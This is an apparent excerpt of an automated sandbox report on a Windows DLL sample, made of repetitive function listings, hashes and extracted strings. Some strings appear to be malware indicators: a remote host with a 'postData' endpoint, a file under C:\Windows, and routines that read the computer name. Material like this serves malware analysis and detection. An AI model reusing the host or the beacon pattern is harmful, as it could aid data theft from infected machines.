                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_free
                                                      • String ID: sid
                                                      • API String ID: 2563830877-1461090996
                                                      • Opcode ID: 45b1833436aebd115a9bf67bcfa3deefc2aff0bcee86cf1d7ed434a2520843f3
                                                      • Instruction ID: 9d7c95b8395188239dba035838d6e92d8085a0d8a7789bfa883ebda44ad11a6c
                                                      • Opcode Fuzzy Hash: 45b1833436aebd115a9bf67bcfa3deefc2aff0bcee86cf1d7ed434a2520843f3
                                                      • Instruction Fuzzy Hash: A93148B5D0025CEEEB05DBA4C845BEDBBB8FF55340F10406AE04667292DBB46E84CB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: uuid
                                                      • API String ID: 271808718-3514781862
                                                      • Opcode ID: 5a70fb0f833a824bb207220769a3dc39f7570e53704effb895e07f21439dd7dd
                                                      • Instruction ID: 60ed96529ef6cf83be549339f636282f4e59d17fc7a14b59ad06169e53b769f5
                                                      • Opcode Fuzzy Hash: 5a70fb0f833a824bb207220769a3dc39f7570e53704effb895e07f21439dd7dd
                                                      • Instruction Fuzzy Hash: 4F319EB5C00158AFEB05DFA4C845BEEBBB4FF08350F50816EE485A7291DB706E89CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strtok$_sprintf
                                                      • String ID: %c%s
                                                      • API String ID: 3026970268-3720742152
                                                      • Opcode ID: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
                                                      • Instruction ID: 38263fc47139841850a4c0d857f1facff7ba69157adaf70a273bbf55d31e901d
                                                      • Opcode Fuzzy Hash: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
                                                      • Instruction Fuzzy Hash: BB11AB3A6041125BC72ACD2D9C509BEB7E8FB85266B20C11AFD88CF142DA35D98793B0
                                                      APIs
                                                        • Part of subcall function 10011988: __EH_prolog.LIBCMT ref: 1001198D
                                                        • Part of subcall function 10011988: __time64.LIBCMT ref: 100119AE
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                        • Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99
                                                        • Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
                                                        • Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C
                                                      • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000FE96
                                                        • Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
                                                        • Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_memmove$ComputerCreateMutexName__time64__vsnprintf_s_sprintf
                                                      • String ID: !$ecf3@#$$1df6..`34
                                                      • API String ID: 2149523713-190452146
                                                      • Opcode ID: 1feabde3a13f95170f0a44f99bc9fd1d7863c0c9fd0dfc79212f008eeccacc60
                                                      • Instruction ID: c22f934d16eb9976fd3c374d665a4e04d28f85c3ea89487fa164600ae51b7a52
                                                      • Opcode Fuzzy Hash: 1feabde3a13f95170f0a44f99bc9fd1d7863c0c9fd0dfc79212f008eeccacc60
                                                      • Instruction Fuzzy Hash: D5312F75900218DFEB14CFA4CC86BED77B4EF15340F6040AAE506AB58ADB74AA48CF51
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000CE7B
                                                        • Part of subcall function 10001F26: _memmove.LIBCMT ref: 10001F7B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_memmove
                                                      • String ID: C:\Windows\mac.txt$api/index/postData$tenghu.6168.live
                                                      • API String ID: 3529519853-4207139594
                                                      • Opcode ID: 91e3656e8a24724188c2711ec235435a1cf4fc0b7a16e443a8df7bf3f593d5a4
                                                      • Instruction ID: adca96bc2beb5f9700a5d6740181b81e08b6f6717ed4fdf97450e115fb6c8430
                                                      • Opcode Fuzzy Hash: 91e3656e8a24724188c2711ec235435a1cf4fc0b7a16e443a8df7bf3f593d5a4
                                                      • Instruction Fuzzy Hash: 1A21C1B59013599FD714CF18C844AEABBF8EF44300F0085ADE604AB342D7B4AA88CBA4
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: invalid string position$req$string too long
                                                      • API String ID: 4104443479-1491086866
                                                      • Opcode ID: 8946bc58172214ad4cfdbafcbe122684c09b910483ef1b17ccb8cead613a64dc
                                                      • Instruction ID: cfd4b9c1781209dca49e7b3e466b15feceaa43bfd17bfcaa1db081935344ae10
                                                      • Opcode Fuzzy Hash: 8946bc58172214ad4cfdbafcbe122684c09b910483ef1b17ccb8cead613a64dc
                                                      • Instruction Fuzzy Hash: 78114F713007069BEB24DE6CD880A6AB7B9EB452D0B20093DF955CB285CB70ED44CBA4
                                                      APIs
                                                      • StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F
                                                      • _swscanf.LIBCMT ref: 100253B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _swscanf
                                                      • String ID: %d.%d.%d.%d%c$0.0.0.0
                                                      • API String ID: 2748852333-3443380886
                                                      • Opcode ID: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
                                                      • Instruction ID: 25fb6b1349beb459330e93536e0f20326eda5ba292d59683b0e3ad5ee5c2430a
                                                      • Opcode Fuzzy Hash: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
                                                      • Instruction Fuzzy Hash: 20118231E001189ADB15DAA89C91BFE73ACEB09241F50456AE807E7540DA61AA048391
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcscmp
                                                      • String ID: ACP$OCP
                                                      • API String ID: 856254489-711371036
                                                      • Opcode ID: 3788e05a5c00897567c11991bb2e28d59036afb96a1be0fb0cd55ae541e3d158
                                                      • Instruction ID: f8bf117776a5426861ffb6740122a8423725848eaef955d6d2416d0bdc1a4bea
                                                      • Opcode Fuzzy Hash: 3788e05a5c00897567c11991bb2e28d59036afb96a1be0fb0cd55ae541e3d158
                                                      • Instruction Fuzzy Hash: 4D01B9755056157BE711DA58DC45FCA37DCDF032A5F294432FE08EA141E734EAC0869C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove_sprintf
                                                      • String ID: %02x$2892a8479d10ebb5bf5597689af04205
                                                      • API String ID: 4290250018-2255596808
                                                      • Opcode ID: d31cec41dd092a9260eac5da9dabf45411b078c2ec4e56666665ca2581059d6f
                                                      • Instruction ID: 7f7d9291e7d1561cba996a3be456474d42d53ddccf85c22bc39dd5b433d6c281
                                                      • Opcode Fuzzy Hash: d31cec41dd092a9260eac5da9dabf45411b078c2ec4e56666665ca2581059d6f
                                                      • Instruction Fuzzy Hash: 7B0124779043446BE700DA68DC45DEFB7ACDF86244F04467AFA9097042EA21E70987E2
                                                      APIs
                                                        • Part of subcall function 10025360: StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F
                                                      • WSASetLastError.WS2_32(00002741,?,?,?,?,100224BC,?,?), ref: 100256E6
                                                      • WSAStringToAddressA.WS2_32(0.0.0.0,?,00000000,?,?,?,?,?,?,100224BC,?,?), ref: 1002570E
                                                      • htons.WS2_32(?), ref: 1002571E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressErrorLastStringhtons
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 1418563660-3771769585
                                                      • Opcode ID: 80c0fe82c571b4466ae40e4aa2bb96a2c231a375e17fac767ce2bb17dd47fc6a
                                                      • Instruction ID: 3f1fcc1f3a2087331d7d15dcf5dccc4673aa52c6449c80de615415efd1df2b85
                                                      • Opcode Fuzzy Hash: 80c0fe82c571b4466ae40e4aa2bb96a2c231a375e17fac767ce2bb17dd47fc6a
                                                      • Instruction Fuzzy Hash: 70F0CD3620011567E3149B55FC46BFA77ACEF84751FC08027FD0BC7250D6B69C4143A8
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,100258DB,?,?,?,?,?,?,00000000), ref: 10025DA0
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 10025DB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: CreateFileTransactedA$kernel32.dll
                                                      • API String ID: 1646373207-3827029016
                                                      • Opcode ID: dea7207520db23331e918d51f5928aa84aa35f06126451d44e72f040fa8df87b
                                                      • Instruction ID: 6e621c7507306dd0d00a2d7c3f0cf8e4072784d058b41c5a65c5220a5ac45b24
                                                      • Opcode Fuzzy Hash: dea7207520db23331e918d51f5928aa84aa35f06126451d44e72f040fa8df87b
                                                      • Instruction Fuzzy Hash: 5A016D31140319AAFB209F50EC09F863BA8EB00765F10811AF9556A1D0C7F69AA4CBE8
                                                      APIs
                                                      • __CxxThrowException@8.LIBCMT ref: 10017979
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 15c9c8b37894c2f68788243e4ca0510385f94a7a4ba97539158ebb1a963152d1
                                                      • Instruction ID: abcd5fdf44a851d009f31012c7346560398e0892ee7d19a3241a88ec05ef4cf5
                                                      • Opcode Fuzzy Hash: 15c9c8b37894c2f68788243e4ca0510385f94a7a4ba97539158ebb1a963152d1
                                                      • Instruction Fuzzy Hash: D2F03A74804209BADB60DA90CD45FDD77B8FB04394F204056EA596E041D775F58ECB21
                                                      APIs
                                                      Strings
                                                      • inc\http\Socket.cpp, xrefs: 1001A62C
                                                      • Error (%s) in line: %d in file: %s, xrefs: 1001A63B
                                                      • value.length() > 0, xrefs: 1001A636
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: Error (%s) in line: %d in file: %s$inc\http\Socket.cpp$value.length() > 0
                                                      • API String ID: 2738768116-3865214099
                                                      • Opcode ID: af253a9d0776008a0feedace79eea7e52168fb9f9dc25d0b06e68507312a9eac
                                                      • Instruction ID: 3cf117a0ffd019b2a007e7704ba5bf3c3ed25bc2d38f70d11fdd4abc5557efdb
                                                      • Opcode Fuzzy Hash: af253a9d0776008a0feedace79eea7e52168fb9f9dc25d0b06e68507312a9eac
                                                      • Instruction Fuzzy Hash: 60E0263620021173E620E4048C01FEA7398EB12BB2F000227F7106A0C19BB0BA8982EA
                                                      APIs
                                                      Strings
                                                      • inc\http\Socket.cpp, xrefs: 1001A66F
                                                      • Error (%s) in line: %d in file: %s, xrefs: 1001A67E
                                                      • value.length() > 0, xrefs: 1001A679
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: Error (%s) in line: %d in file: %s$inc\http\Socket.cpp$value.length() > 0
                                                      • API String ID: 2738768116-3865214099
                                                      • Opcode ID: c2dfad6af6c8c749b56c24bf6833c75b1204c47d6c3b1cc853e2952c292a9739
                                                      • Instruction ID: e4337fc0f58c1900e36de4e47a3f2845e6f3211dd648dfe6763fce8059eeaeca
                                                      • Opcode Fuzzy Hash: c2dfad6af6c8c749b56c24bf6833c75b1204c47d6c3b1cc853e2952c292a9739
                                                      • Instruction Fuzzy Hash: B8E0263210021077E710F4048C01FEB73A8DB02BB1F144227F7102A0C297B0BA8982E9
                                                      APIs
                                                      Strings
                                                      • Error (%s) in line: %d in file: %s, xrefs: 10017CB2
                                                      • data.length() > 0, xrefs: 10017CAD
                                                      • inc\http\HttpConnection.cpp, xrefs: 10017CA3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf
                                                      • String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\HttpConnection.cpp
                                                      • API String ID: 2738768116-3760416322
                                                      • Opcode ID: 4255c16bde2e3edf86c81f29ce580747cf4caa3fc488035be78a800a0fafe731
                                                      • Instruction ID: f89cb4ef67b9403efdd39d3a924859df5da6e48757c41decb9cd1966042a8b7d
                                                      • Opcode Fuzzy Hash: 4255c16bde2e3edf86c81f29ce580747cf4caa3fc488035be78a800a0fafe731
                                                      • Instruction Fuzzy Hash: 58E0CD3311021177E210F554DC01FD67358FB516B1F040237BB146B1C6D7F27A5982E5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __getptd_noexit
                                                      • String ID:
                                                      • API String ID: 3074181302-0
                                                      • Opcode ID: 51802beb59c1eba136ef365886ddaad28624ca3ca5aef29b921a4c3245a07fe3
                                                      • Instruction ID: 9a01dc5978f94277987ef6d4315d4500b0bc7dc9949d64def392f00dce809a35
                                                      • Opcode Fuzzy Hash: 51802beb59c1eba136ef365886ddaad28624ca3ca5aef29b921a4c3245a07fe3
                                                      • Instruction Fuzzy Hash: 47819F79A0025A9FCF12DF58DD8059E7BA6FF85346F164569EC08AF301DB31BD108BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
